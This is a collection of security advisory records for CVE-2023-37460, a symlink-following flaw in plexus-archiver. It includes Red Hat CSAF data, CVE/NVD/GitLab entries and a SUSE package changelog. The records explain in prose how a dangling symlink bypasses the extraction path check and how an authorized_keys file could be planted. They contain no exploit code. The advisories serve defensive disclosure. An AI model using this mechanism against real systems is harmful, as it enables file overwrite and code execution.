"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-10-26T10:05:45+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
RHSA-2023:6138
Vulnerability from csaf_redhat - Published: 2023-10-26 10:05 - Updated: 2025-11-21 18:48Summary
Red Hat Security Advisory: Migration Toolkit for Runtimes security update
Notes
Topic
An update is now available for Migration Toolkit for Runtimes.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6138",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "WINDUPRULE-1038",
"url": "https://issues.redhat.com/browse/WINDUPRULE-1038"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json"
}
],
"title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update",
"tracking": {
"current_release_date": "2025-11-21T18:48:19+00:00",
"generator": {
"date": "2025-11-21T18:48:19+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2023:6138",
"initial_release_date": "2023-10-26T10:05:45+00:00",
"revision_history": [
{
"date": "2023-10-26T10:05:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-10-26T10:05:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T18:48:19+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product": {
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_id": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8"
}
}
}
],
"category": "product_family",
"name": "Migration Toolkit for Runtimes"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-10-26T10:05:45+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
GSD-2023-37460
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry's content to the symlink's target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-37460",
"id": "GSD-2023-37460"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-37460"
],
"details": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.",
"id": "GSD-2023-37460",
"modified": "2023-12-13T01:20:24.249036Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2023-37460",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "plexus-archiver",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u003c 4.8.0"
}
]
}
}
]
},
"vendor_name": "codehaus-plexus"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue."
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-22",
"lang": "eng",
"value": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
}
]
},
{
"description": [
{
"cweId": "CWE-61",
"lang": "eng",
"value": "CWE-61: UNIX Symbolic Link (Symlink) Following"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"refsource": "MISC",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"refsource": "MISC",
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"refsource": "MISC",
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
]
},
"source": {
"advisory": "GHSA-wh3p-fphp-9h2m",
"discovery": "UNKNOWN"
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "(,4.8.0)",
"affected_versions": "All versions before 4.8.0",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-22",
"CWE-937"
],
"date": "2023-08-03",
"description": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.",
"fixed_versions": [
"4.8.0"
],
"identifier": "CVE-2023-37460",
"identifiers": [
"CVE-2023-37460",
"GHSA-wh3p-fphp-9h2m"
],
"not_impacted": "All versions starting from 4.8.0",
"package_slug": "maven/org.codehaus.plexus/plexus-archiver",
"pubdate": "2023-07-25",
"solution": "Upgrade to version 4.8.0 or above.",
"title": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
],
"uuid": "ded6bbbc-3ead-4282-bad5-7314a91bf82c"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.8.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2023-37460"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
},
{
"lang": "en",
"value": "CWE-61"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"refsource": "MISC",
"tags": [
"Release Notes"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"refsource": "MISC",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"refsource": "MISC",
"tags": [
"Patch"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
}
]
}
},
"impact": {
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
}
},
"lastModifiedDate": "2023-08-03T13:52Z",
"publishedDate": "2023-07-25T20:15Z"
}
}
}
SUSE-RU-2024:0560-1
Vulnerability from csaf_suse - Published: 2024-02-21 04:34 - Updated: 2024-02-21 04:34Summary
Recommended update for Java
Notes
Title of the patch
Recommended update for Java
Description of the patch
This update for Java fixes the following issues:
plexus-archiver was updated from version 4.2.1 to 4.8.0:
- Changes of 4.8.0:
* Security issues fixed:
+ CVE-2023-37460: Avoid override target symlink by standard file in AbstractUnArchiver (bsc#1215973)
* New features and improvements:
+ Added tzst alias for tar.zst archiver/unarchived
* Bugs fixed:
+ Detect permissions for addFile
* Maintenance:
+ Removed public modifier from JUnit 5 tests
+ Use https in scm/url
+ Removed junit-jupiter-engine from project dependencies
+ Removed parent and reports menu from site
+ Cleanup after 'veryLargeJar' test
+ Override project.url
- Changes of 4.7.1:
* Bugs fixed:
+ Don't apply umask on unknown perms (Win)
- Changes of 4.7.0:
* New features and improvements:
+ add umask support and use 022 in RB mode
+ Use NIO Files for creating temporary files
+ Deprecate the JAR Index feature (JDK-8302819)
+ Added Archiver aliases for tar.*
* Maintenance:
+ Use JUnit TempDir to manage temporary files in tests
+ Override uId and gId for Tar in test
+ Bump maven-resources-plugin from 2.7 to 3.3.1
- Changes of 4.6.3:
* New features and improvements:
+ Fixed path traversal vulnerability
The vulnerability affects only directories whose name begins
with the same prefix as the destination directory. For example
malicious archive may extract file in /opt/directory instead
of /opt/dir.
- Changes of 4.6.2:
* Bugs fixed:
+ Fixed regression in handling symbolic links
- Changes of 4.6.1:
* Bugs fixed:
+ Normalize file separators before warning about equal archive entries
- Changes of 4.6.0:
* New features and improvements:
+ keep file/directory permissions in Reproducible Builds mode
- Changes of 4.5.0:
* New features and improvements:
+ Added zstd (un)archiver support
* Bugs fixed:
+ Fixed UnArchiver#isOverwrite not working as expected
- Changes of 4.4.0:
* New features and improvements:
+ Drop legacy plexus API and use only JSR330 components
- Changes of 4.3.0:
* New features and improvements:
+ Require Java 8
+ Refactor to use FileTime API
+ Rename setTime method to setZipEntryTime
+ Convert InputStreamSupplier to lambdas
* Bugs fixed:
+ Reproducible Builds not working when using modular jar
- Changes of 4.2.7:
* New features and improvements:
+ Respect order of META-INF/ and META-INF/MANIFEST.MF entries in a JAR file
- Changes of 4.2.6:
* New features and improvements:
+ FileInputStream, FileOutputStream, FileReader and FileWriter are no longer used
+ Code cleanup
- Changes of 4.2.5:
* New features and improvements:
+ Speed improvements
* Bugs fixed:
+ Fixed use of a mismatching Unicode path extra field in zip unarchiving
- Changes of 4.2.4:
* Bugs fixed:
+ Fixed unjustified warning about casing for directory entries
- Changes of 4.2.2:
* Bugs fixed:
+ DirectoryArchiver fails for symlinks if a parent directory doesn't exist
objectweb-asm was updated to version 9.6:
- Changes of version 9.6:
* New Opcodes.V22 constant for Java 22
* Bugs fixed:
+ Analyzer produces frames that have different locals than those detected by JRE bytecode verifier
+ Invalid stackmap generated when the instruction stream has new instruction after invokespecial to <init>
+ Analyzer can fail to catch thrown exceptions
+ `asm-analysis` Frame allocates an array unnecessarily inside `executeInvokeInsn`
+ Fixed bug in `CheckFrameAnalyzer` with static methods
- Changes of version 9.5:
* New Opcodes.V21 constant for Java 21
* New readBytecodeInstructionOffset hook in ClassReader
* Added more detailed exception messages
* Javadoc improvements and fixes
* Bugs fixed:
+ Silent removal of zero-valued entries from the line-number table
- Changes of version 9.4:
* Changes:
+ New Opcodes.V20 constant for Java 20
+ Added more checks in CheckClassAdapter
+ Javadoc improvements and fixes
+ `module-info` classes can be built without Gradle and Bnd
+ Parent POM updated to `org.ow2:ow2:1.5.1`
* Bugs fixed:
+`CheckClassAdapter` is no longer transparent for MAXLOCALS
+ Added public `getDelegate` method to all visitor classes
+ Analyzer does not compute optimal maxLocals for static methods
+ Fixed `SignatureWriter` when a generic type has a depth over 30
+ Skip remap inner class name if not changed in Remapper
maven-archiver was updated from version 3.5.0 to 3.6.1:
- Changes of 3.6.1:
* New Features:
+ Deprecated the JAR Index feature (JDK-8302819)
* Task:
+ Refreshed download page
+ Prefer JDK features over plexus-utils, plexus-io
- Changes of 3.6.0:
* Task:
+ Require Java 8
+ Drop m-shared-utils from deps
maven-assembly-plugin was updated from version 3.3.0 to 3.6.0:
- Changes of 3.6.0:
* Bugs fixed:
+ finalName as readonly parameter makes common usecases very complicated
+ Symbolic links get copied with absolute path
+ Warning if using Maven 3.9.1
+ Minimal default Manifest configuration of jar archiver should be respected
* New Features:
+ Support Zstandard compression format
* Improvements:
+ In RB mode, apply 022 umask to ignore environment group write umask
+ Added system requirements history
* Task:
+ Dropped deprecated repository element
+ Support running build on Java 20
+ Refresh download page
+ Cleanup declared dependencies
+ Avoid using deprecated methods of `plexus-archiver`
- Changes of 3.5.0:
* Bugs fixed:
+ File permissions removed during assembly:single since 3.2.0
- Changes of 3.4.2:
* Bugs fixed:
+ Fixed Excludes filtering
* Task:
+ Fixed examples to refer to https instead of http
- Changes of 3.4.1:
* Bugs fixed:
+ Fixed error build with shared assemblies
- Changes of 3.4.0:
* Bugs fixed:
+ dependencySet includes filter with classifier breaks include of artifacts without classifier
* Task:
+ Speed improvements
+ Update plugin (requires Maven 3.2.5+)
+ Assembly plugin resolves too much, even plugins used to build dependencies
+ Deprecated the repository element in assembly descriptor
+ Upgraded to Java 8, drop unused dependencies
maven-common-artifact-filters was updated from version 3.0.1 to 3.3.2:
- Changes of 3.3.2:
* Bugs fixed:
+ PatternIncludesArtifactFilters raising NPE for patterns w/ wildcards and artifactoid w/ null on any coordinate
- Changes of 3.3.1:
* Bugs fixed:
+ Pattern w/ 4 elements may be GATV or GATC
- Changes of 3.3.0:
* Bugs fixed:
+ null passed to DependencyFilter in EclipseAetherFilterTransformerTest
+ PatternIncludesArtifactFilter#include(Artifact)
+ Common Artifact Filters pattern parsing with classifier is broken
* Task:
+ Sanitized dependencies
+ Upgraded to Maven Parent 36, to Maven 3.2.5, to Java 8 and clean up dependencies
- Changes of 3.2.0:
* Improvements:
+ Big speed improvements for patterns that do not contain any wildcard
- Changes of 3.1.1:
* Bugs fixed:
+ Updated JIRA URL for maven-common-artifact-filters
* Improvements:
+ Made build Reproducible
- Changes of 3.1.0:
* Bugs fixed:
+ Several filters do not preserve order of artifacts filtered
maven-compiler-plugin was updated from version 3.10.1 to 3.11.0:
Changes of 3.11.0:
* New features and improvements:
+ Added a useModulePath switch to the testCompile mojo
+ Allow dependency exclusions for 'annotationProcessorPaths'
+ Use maven-resolver to resolve 'annotationProcessorPaths' dependencies
+ Upgrade plexus-compiler to improve compiling message
+ compileSourceRoots parameter should be writable
+ Change showWarnings to true by default
+ Warn about warn-config conflicting values
+ Update default source/target from 1.7 to 1.8
+ Display recompilation causes
+ Added some parameter to pattern from stale source calculation
+ Added dedicated option for implicit javac flag
* Bugs fixed:
+ Fixed incorrect detection of dependency change
+ Test with Maven 3.9.0 and fix the failing IT
+ Resolved all annotation processor dependencies together
+ Defining maven.compiler.release as empty string ends with NumberFormatException in testCompileMojo
+ Fixed missing dirs in createMissingPackageInfoClasses
+ Set Xcludes in config passed to actual compiler
maven-dependency-analyzer was updated from version 1.10 to 1.13.2:
- Changes of 1.13.2:
* Changes and bugs fixed:
+ Made mvn dependency:analyze work with OpenJDK 11
+ Fixed jdk8 incompatibility at runtime (NoSuchMethodError)
+ Upgraded asm to 8.0.1
+ Use try with resources to avoid leaks
+ dependency:analyze recommends test scope for test-only artifacts that have non-test scope
+ remove reference to deprecated public mutable field
+ Updated JIRA URL
+ dependency:analyze should recommend narrower scope where possible
+ Remove dependency on jmock
+ Inline deprecated field
+ Added more JavaDoc
+ Handle different classes from same artifact used by model and test code
+ Included class names in used undeclared dependencies
+ Check maximum allowed Maven version
+ Get rid of maven-plugin-testing-tools for IT test
+ Require Maven 3.2.5+
+ Analyze project classes only once
+ Fixed array parsing
+ CONSTANT_METHOD_TYPE should not add to classes
+ Inner classes are in same compilation unit as container class
+ Upgraded Parent to 36
+ Cleanup IT tests
+ Replace Codehaus Plexus utils with java.nio.file.Files and Apache Commons
+ Fixed bug with 'non-test scoped test only dependencies found'
+ Bump asm from 9.4 to 9.5
+ Refresh download page
+ Upgrade Parent to 39
+ Build on JDK 19, 20
+ Prefer JDK classes to Plexus utils
+ Replaced System.out by logger
+ Fixed java.lang.RuntimeException: Unknown constant pool type
+ Switched to JUnit 5
+ Dependency improvements
maven-dependency-plugin was updated from version 3.1.2 to 3.6.0:
- Changes in 3.6.0:
* Bugs fixed:
+ Obsolete example of -Dverbose on web page
+ Unsupported verbose option still appears in docs
+ dependency:go-offline does not use repositories from parent pom in reactor build
+ Fixed possible NPE
+ `dependency:analyze-only` goal fails on OpenJDK 14
+ FileWriter and FileReader should be replaced
+ Dependency Plugin go-offline doesn't respect artifact classifier
+ analyze-only failed: Unsupported class file major version 60 (Java 16)
+ analyze-only failed: Unsupported class file major version 61 (Java 17)
+ copy-dependencies fails when using excludeScope=test
+ mvn dependency:analyze detected wrong transitive dependency
+ dependency plugin does not work with JDK 16
+ skip dependency analyze in ear packaging
+ Non-test dependency reported as Non-test scoped test only dependency
+ 'Dependency not found' with 3.2.0 and Java-17 while analyzing
+ Tree plugin does not terminate with 3.2.0
+ Minor improvement - continue
+ analyze-only failed: PermittedSubclasses requires ASM9
+ Broken Link to 'Introduction to Dependency Mechanism Page'
+ Sealed classes not supported
+ Dependency tree in verbose mode for war is empty
+ Javadoc was not updated to reflect that :tree's verbose option is now ok
+ error dependency:list (caused by postgresql dependency)
+ :list-classes does not skip if skip is set
